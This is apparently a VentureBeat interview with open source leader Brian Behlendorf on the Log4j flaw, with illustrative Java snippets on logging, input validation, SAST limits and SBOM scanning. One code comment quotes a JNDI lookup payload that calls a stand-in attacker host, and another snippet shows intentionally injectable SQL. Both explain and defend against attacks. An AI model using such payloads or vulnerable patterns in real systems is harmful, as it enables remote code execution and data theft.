
Open source security leader Brian Behlendorf discusses the impact of Log4j



For the last few weeks, the world of computer security has been turned upside down as teams struggled to understand if they needed to worry about the Log4j vulnerability. The relatively small Java library didn’t do anything flashy,  but it was a well-built open source tool for tracking software events, and that made it popular with Java developers. That meant it often found its way into corners that people didn’t expect.

While the security teams will continue to debate the nature of the flaw itself and search for similar problems, many are wondering how this might change the industry’s reliance on open source practices. Everyone enjoys the free tools until a problem like this appears. Is there a deeper issue with open source development that brought this about? Can society continue to rely upon the bounty of open source without changing its expectations and responsibilities?

VentureBeat talked to Brian Behlendorf to understand the depth of the problem and also try to make sense of how software developers can prevent another flaw like this from getting such wide distribution. Behlendorf was one of the original developers of the Apache web servers, and he’s long been a leader of open source development. He’s been working with the Linux Foundation and the Open Source Security Foundation (OpenSSF) to find better practices and support them throughout the open source ecosystem.



VentureBeat: Could such a thing happen with closed source, too? 

Brian Behlendorf: Absolutely. There’s no such thing as bug-free software, right? There [are] only bugs that have yet to be discovered.

Obviously, some software receives a lot more scrutiny than other software, but there’s no reason to believe that commercial, proprietary software is any more thoroughly scrutinized than open source software.

VentureBeat: There’s probably not enough scrutiny anywhere, right?

Behlendorf: It’s just not a regular practice for software developers to be asked to go back and reread and re-scrutinize old code, whether commercial or open source. It’s for the same reason you don’t see a lot of scientists repeating old experiments. They’re not rewarded for revisiting old work.

They’re rewarded for adding new features, for doing new work. You’re not rewarded for refactoring old code. You know, this one bit of code that Larry over there wrote? After he left or quit or whatever, no one’s gone back to revisit it because it seems to work. It seems to pass the tests. And if it’s so thorny and uncommented, we just want to treat it like a black box.


VentureBeat: It’s the same situation in open or closed source teams. 

Behlendorf: The incentives, whether in commercial or open source code, really don’t favor going back and looking at this stuff. It often takes a disaster like this to convince people to put the effort into [finding] these problems.


VentureBeat: I was working on a project, and we made one filtering feature extra fancy by offering, say, arbitrary regex filtering. The manager said it was “too wonderful” and told us to “dial it back.” Well, we left the arbitrary regex code in there and just put in a pull-down menu with a few options that, in turn, fed a regex to the backend. I think something similar probably happened with the Log4j team, right?

Behlendorf: Absolutely. I think in both proprietary and open source code, there’s a tendency to say “yes” when somebody shows up with code that implements a new feature. There’s an inclination to accept it in order to grow the pool of developers around the project. Let’s err toward saying “yes” to people who seem like reasonable people.
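That pattern is easy to reproduce. Here’s a minimal sketch of the interviewer’s anecdote (the class and preset names are invented for illustration): the UI narrows the choices to a pull-down menu, but the general-purpose regex engine stays reachable underneath it.

```java
import java.util.Map;
import java.util.regex.Pattern;

public class FilterMenu {
    // What the user sees: a handful of vetted choices.
    private static final Map<String, String> PRESETS = Map.of(
            "Errors only", "ERROR.*",
            "Warnings only", "WARN.*",
            "Everything", ".*");

    // What actually runs: the original arbitrary-regex backend,
    // still present and still reachable by anything that calls it.
    static boolean matches(String pattern, String line) {
        return Pattern.compile(pattern).matcher(line).find();
    }

    // The menu just feeds a canned pattern into the same code path,
    // so the "dialed back" feature never really went away.
    static boolean filter(String menuChoice, String line) {
        return matches(PRESETS.getOrDefault(menuChoice, ".*"), line);
    }
}
```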


VentureBeat: But then that opens the door to problems, right? 

Behlendorf: Absolutely. Should you have a logging utility parse user-contributed input for formatting instructions that expand into other things? The answer would be “no.” In fact, this is something that is in our secure coding guide and training materials that we put up on edX as part of the OpenSSF activity. We specifically recommend against trusting any form of user input. But if your inclination is to say “yes” to new features until proven wrong, then you’re going to end up with surprises like this.
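To make that concrete: in Log4j 2.0 through 2.14.x, message lookups meant an ordinary-looking logging call could be turned against the application. A minimal sketch of the vulnerable pattern (the handler and its names are hypothetical):

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginHandler {
    private static final Logger log = LogManager.getLogger(LoginHandler.class);

    // userAgent comes straight from an HTTP header, i.e., from the attacker.
    void recordLogin(String user, String userAgent) {
        // On vulnerable Log4j 2.x versions, a value like
        // "${jndi:ldap://attacker.example/a}" embedded in the message was
        // expanded as a lookup (CVE-2021-44228), which could fetch and run
        // remote code. Nothing about this call looks unusual.
        log.info("Login by {} with User-Agent {}", user, userAgent);
    }
}
```

Notably, even this parameterized form was affected, because lookups were applied to the formatted message; the practical remediation was upgrading to a release with message lookups disabled, not just auditing call sites.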

VentureBeat: But if you start rejecting things, the project also dies, correct? 

Behlendorf: The opposite of this is to say “no” to everything unless it’s thoroughly vetted. That can also be a recipe for obsolescence, a path to where there isn’t any invention or risk-taking or any new features at all. There [are] two ends of a spectrum, and we have to navigate a path between them.


VentureBeat: You mentioned some of the courses from OpenSSF. Do you think we can develop the meta procedures to try to catch these kinds of things?

Behlendorf: Definitely. There’s a corpus of knowledge out there about how to write software defensively, and how to be thoughtful about what’s going on below the layers of abstraction that you typically deal with. These are not often part of the computer science education system, nor are they part of the more vocational training. We need to think more about writing code defensively and writing for a zero-trust environment.

Maybe we need to start expect[ing] people who become maintainers to have either taken a course like this or somehow proven proficiency in this.
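The “never trust user input” guidance usually translates into validating against an allowlist before a value reaches anything that interprets strings. A small illustrative sketch (the pattern and limits here are arbitrary choices, not prescribed by the OpenSSF materials):

```java
import java.util.regex.Pattern;

public final class InputGuard {
    // Accept only a narrow, explicitly allowed shape; reject everything else.
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9_-]{1,32}");

    static String requireSafeName(String raw) {
        if (raw == null || !SAFE_NAME.matcher(raw).matches()) {
            throw new IllegalArgumentException("rejected untrusted input");
        }
        return raw;
    }
}
```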


VentureBeat: Do you find that it’s possible to do any kind of automation with this? I remember some guys at the OpenBSD group wrote lots of little scripts looking for the basic anti-patterns to avoid.

Behlendorf: Of course, there [are] static analysis tools and fuzzers. The SAST tools are really designed to try to look for some of these common mistakes. But in the Log4j case, it’s not clear to me that the tools would have caught it. It was kind of an intentional design [choice that became a] flaw. I don’t know of any of them that highlight problematic architectures, because that requires almost an AI-level degree of awareness of what the intent of the program was.
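A rough illustration of that distinction (the snippet is ours, not Behlendorf’s): SAST tools are good at local, pattern-shaped bugs such as string-concatenated SQL, while a deliberate feature like Log4j’s message lookups presents no such local signal.

```java
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Contrast {
    private static final Logger log = LogManager.getLogger(Contrast.class);

    // A classic injection bug: string concatenation into SQL. Most SAST
    // tools flag this reliably, because the anti-pattern is local and textual.
    ResultSet lookup(Connection db, String name) throws SQLException {
        Statement st = db.createStatement();
        return st.executeQuery("SELECT * FROM users WHERE name = '" + name + "'");
    }

    // Nothing here looks wrong to a pattern matcher. The danger lived in
    // Log4j's own lookup feature, an architectural decision a scanner has
    // no way to judge.
    void record(String name) {
        log.info("lookup for {}", name);
    }
}
```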


VentureBeat: Perhaps it could become a bigger part of the infrastructure?

Behlendorf: Yes, it could be, in the long term. We have started [seeing] AI applied to coding. You’ve seen it on GitHub: the AI-assisted software development techniques where it is [thought] of like autocomplete, but for software development.

They tend to cost money to use, and that can be one barrier to teams picking them up.

The other problem is that a lot of these tools generate a lot of false positives: things that look like they might be wrong but actually aren’t. It’s incredibly laborious to go through the false positives to sort out what’s a legitimate issue and what just looks amiss.

So one thing we’d like to do at OpenSSF is [work to] figure out, “How do we help with that, perhaps by bringing together a common portal where the reports from these kinds of tools land?” Software developers who are core to projects like Log4j can start to separate out the false positives and mark those as, “Don’t bother me with these again,” and get some economy of scale going, rather than lots and lots of different people running these tools and having to separate the false positives independently. It’s a hard thing to entirely get right through automation.

Back in May, I believe, the White House called for a software bill of materials: basically, labeling on a software package that tells you what’s inside it. When a new vulnerability comes out, it allows you to quickly figure out what’s inside your deployed software and say, “Oh, here’s where I’m using Log4j, even though it was embedded three layers deep inside of some other black box.”
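As a sketch of how that query plays out, suppose each deployed service ships a CycloneDX-style SBOM as JSON. Even a crude scan (real tooling would parse the JSON and match package URLs; the file layout here is an assumption) can answer “where am I running log4j-core?” across a fleet:

```java
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.stream.Stream;

public class SbomScan {
    public static void main(String[] args) throws Exception {
        // args[0]: a directory holding one SBOM JSON file per deployment.
        try (Stream<Path> sboms = Files.list(Path.of(args[0]))) {
            sboms.filter(p -> p.toString().endsWith(".json"))
                 .forEach(SbomScan::check);
        }
    }

    static void check(Path sbom) {
        try {
            // Crude substring match on the component name; enough to show
            // the "what's inside my deployed software?" question being asked.
            if (Files.readString(sbom).contains("log4j-core")) {
                System.out.println(sbom + ": contains log4j-core");
            }
        } catch (Exception e) {
            System.err.println("could not read " + sbom + ": " + e.getMessage());
        }
    }
}
```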

VentureBeat: I’m worried that this makes people even leerier of libraries.  

Behlendorf: We’ve tended to encourage over-atomization in software packages. It’s common to pull in hundreds or thousands of dependencies today. A while ago, there was a library (left-pad) that was pulled because someone had a dispute with somebody, whether it was around licensing or branding. This caused a downstream ripple effect where internet services were going down because teams couldn’t push updates to production, or when they did, things were failing in brittle ways.

This should wake people up, because we need to get serious about security and resiliency in how we build and push to production. It would really be helpful to pull these small little bits together into a common platform, then vet it so everything in here is kept up to date and everything in here is designed to work with each other. I would love to see more focus on getting back to aggregated libraries.


VentureBeat: You’ve talked about some new projects coming down the road to address these problems from the OpenSSF. Can you talk about them? 

Behlendorf: We’re still putting the pieces together. For the last year, the project, which is part of the Linux Foundation and has members like Microsoft, Google, and a lot of financial services firms, has been focusing on software as a supply chain, right? From original developers through building and incorporating these dependencies out to the end user, there [are] all these places where there [are] assumptions about how the world works.

What we’ve launched already has been efforts in training for better security on edX. We’ll start using some of the funding that we’ve been able to acquire to go and do targeted interventions on some of the more critical pieces of infrastructure, which will be really helpful. Are there ways to do security scans of them, the static analysis scans, and have somebody come in and do some remediation?


VentureBeat: Is there some way to support the projects themselves? 

Behlendorf: We feel that there really hasn’t been much focus on the security teams at places like Apache, or the Python Foundation, or the Node.js community. How do they operate? How are they resourced? What standards do they adopt? What we’re planning to do is work with those security teams, develop common standards for how to run a security team at an open source project, and maybe find ways to channel funds directly to those teams so they can be more proactive.

One of the things that open source projects try to do is minimum viable administration. They all try to say, “What’s the least amount of bureaucracy that we can get away with while protecting our hides from a legal point of view?”

That means that the security teams tend to be under-resourced, and it means that they tend to shy away from establishing requirements for things like: if you’re a maintainer on a project, have you taken security training? Maybe that’s part of the shift we can help nudge in a certain direction: helping foundations get the resources to better provision security teams, maybe even with paid security experts on those teams who can go and proactively look for the next Log4j vulnerability deep in their code. We’ve pulled together a bunch of funding to do some interesting stuff in this domain, and you’ll start to see some announcements soon.
